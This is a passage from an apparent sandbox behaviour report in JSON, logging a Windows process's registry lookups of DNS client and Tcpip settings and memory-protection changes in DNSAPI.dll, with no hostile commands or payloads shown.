            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "EnableMDNS"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS"
              }
            ],
            "repeated": 0,
            "id": 1256
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DnsTest"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest"
              }
            ],
            "repeated": 0,
            "id": 1257
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "UseCompartments"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments"
              }
            ],
            "repeated": 0,
            "id": 1258
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "CacheAllCompartments"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments"
              }
            ],
            "repeated": 0,
            "id": 1259
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "UseNewRegistration"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration"
              }
            ],
            "repeated": 0,
            "id": 1260
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "ResolverRegistration"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration"
              }
            ],
            "repeated": 0,
            "id": 1261
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "ResolverRegistrationOnly"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly"
              }
            ],
            "repeated": 0,
            "id": 1262
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "NewDhcpSrvRegistration"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration"
              }
            ],
            "repeated": 0,
            "id": 1263
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DirectAccessPreferLocal"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal"
              }
            ],
            "repeated": 0,
            "id": 1264
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DisableIdnEncoding"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding"
              }
            ],
            "repeated": 0,
            "id": 1265
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "EnableIdnMapping"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping"
              }
            ],
            "repeated": 0,
            "id": 1266
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "ShortnameProxyDefault"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault"
              }
            ],
            "repeated": 0,
            "id": 1267
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DisableNRPTForAdapterRegistration"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration"
              }
            ],
            "repeated": 0,
            "id": 1268
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "TestMode_AdaptiveTimeoutHistoryLength"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength"
              }
            ],
            "repeated": 0,
            "id": 1269
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedff9cd60",
            "parentcaller": "0x7ffedff9cb93",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "TestMode_AdaptiveTimeoutRecalculationInterval"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval"
              }
            ],
            "repeated": 0,
            "id": 1270
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffabccb",
            "parentcaller": "0x7ffedffaaa57",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DnsQueryTimeouts"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts"
              }
            ],
            "repeated": 0,
            "id": 1271
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa7e3",
            "parentcaller": "0x7ffedffaa179",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "DnsQueryTimeouts"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts"
              }
            ],
            "repeated": 0,
            "id": 1272
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffabccb",
            "parentcaller": "0x7ffedffaaa57",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "DnsQuickQueryTimeouts"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts"
              }
            ],
            "repeated": 0,
            "id": 1273
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa7e3",
            "parentcaller": "0x7ffedffaa179",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "DnsQuickQueryTimeouts"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts"
              }
            ],
            "repeated": 0,
            "id": 1274
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac301",
            "parentcaller": "0x7ffedff9cbe1",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1275
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac316",
            "parentcaller": "0x7ffedff9cbe1",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              }
            ],
            "repeated": 0,
            "id": 1276
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac013",
            "parentcaller": "0x7ffedffaa75e",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Class",
                "value": "Class"
              },
              {
                "name": "Access",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1277
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac19f",
            "parentcaller": "0x7ffedffaa75e",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              },
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              }
            ],
            "repeated": 0,
            "id": 1278
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac1db",
            "parentcaller": "0x7ffedffaa75e",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              }
            ],
            "repeated": 0,
            "id": 1279
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa7e3",
            "parentcaller": "0x7ffedffa835a",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "Hostname"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname"
              }
            ],
            "repeated": 0,
            "id": 1280
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa88d",
            "parentcaller": "0x7ffedffa835a",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "Hostname"
              },
              {
                "name": "Data",
                "value": "HOME-PC"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname"
              }
            ],
            "repeated": 0,
            "id": 1281
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa9d8",
            "parentcaller": "0x7ffedffa835a",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              }
            ],
            "repeated": 0,
            "id": 1282
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa9ed",
            "parentcaller": "0x7ffedffa835a",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1283
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac013",
            "parentcaller": "0x7ffedffa9bf3",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Class",
                "value": "Class"
              },
              {
                "name": "Access",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1284
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac19f",
            "parentcaller": "0x7ffedffa9bf3",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              },
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              }
            ],
            "repeated": 0,
            "id": 1285
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac1db",
            "parentcaller": "0x7ffedffa9bf3",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              }
            ],
            "repeated": 0,
            "id": 1286
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffa9c33",
            "parentcaller": "0x7ffedffa8371",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\System\\DNSClient"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\System\\DNSClient"
              }
            ],
            "repeated": 0,
            "id": 1287
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa7e3",
            "parentcaller": "0x7ffedffa9c69",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "Domain"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain"
              }
            ],
            "repeated": 0,
            "id": 1288
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa88d",
            "parentcaller": "0x7ffedffa9c69",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "ValueName",
                "value": "Domain"
              },
              {
                "name": "Data",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain"
              }
            ],
            "repeated": 0,
            "id": 1289
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac301",
            "parentcaller": "0x7ffedffa9ce8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1290
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac316",
            "parentcaller": "0x7ffedffa9ce8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              }
            ],
            "repeated": 0,
            "id": 1291
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac013",
            "parentcaller": "0x7ffedffaa75e",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Class",
                "value": "Class"
              },
              {
                "name": "Access",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1292
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac19f",
            "parentcaller": "0x7ffedffaa75e",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              },
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters"
              }
            ],
            "repeated": 0,
            "id": 1293
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffac1db",
            "parentcaller": "0x7ffedffaa75e",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient"
              }
            ],
            "repeated": 0,
            "id": 1294
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa7e3",
            "parentcaller": "0x7ffedffa9b67",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "Hostname"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname"
              }
            ],
            "repeated": 0,
            "id": 1295
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa88d",
            "parentcaller": "0x7ffedffa9b67",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              },
              {
                "name": "ValueName",
                "value": "Hostname"
              },
              {
                "name": "Data",
                "value": "HOME-PC"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname"
              }
            ],
            "repeated": 0,
            "id": 1296
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa9d8",
            "parentcaller": "0x7ffedffa9b67",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000048c"
              }
            ],
            "repeated": 0,
            "id": 1297
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffedffaa9ed",
            "parentcaller": "0x7ffedffa9b67",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1298
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee2111793",
            "parentcaller": "0x7ffedff5207d",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003ec"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\Nsi"
              },
              {
                "name": "IoControlCode",
                "value": "0x00120007"
              },
              {
                "name": "InputBuffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb1\\xf7\\xdf\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xea\\x15\\x07\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "OutputBuffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb1\\xf7\\xdf\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\xea\\x15\\x07\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1299
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee21117c7",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000490"
              }
            ],
            "repeated": 0,
            "id": 1300
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee004f000"
              },
              {
                "name": "ModuleName",
                "value": "DNSAPI.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1301
          },
          {
            "timestamp": "2025-11-20 10:58:34,047",
            "thread_id": "3408",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee004f000"
              },
              {
                "name": "ModuleName",
                "value": "DNSAPI.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
